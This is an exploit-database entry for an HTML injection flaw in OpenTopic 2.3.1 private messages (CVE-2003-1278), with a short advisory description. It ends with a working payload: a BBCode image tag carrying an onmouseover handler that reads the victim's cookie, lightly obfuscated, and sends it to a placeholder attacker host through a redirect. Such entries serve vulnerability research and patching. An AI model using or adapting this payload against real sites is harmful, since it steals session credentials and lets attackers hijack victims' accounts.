[] NeoSense
E X P L O I T S
title author type platform port cve id

OpenTopic 2.3.1 - Private Message HTML Injection

Author: frog
type: webapps
platform: php
port: 
date_added: 2003-01-06 
date_updated: 2012-10-21 
verified: 1 
codes: CVE-2003-1278;OSVDB-37039 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/6523/info

A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.

When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site.

Exploitation may allow for theft of cookie-based authentication credentials or other attacks.

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.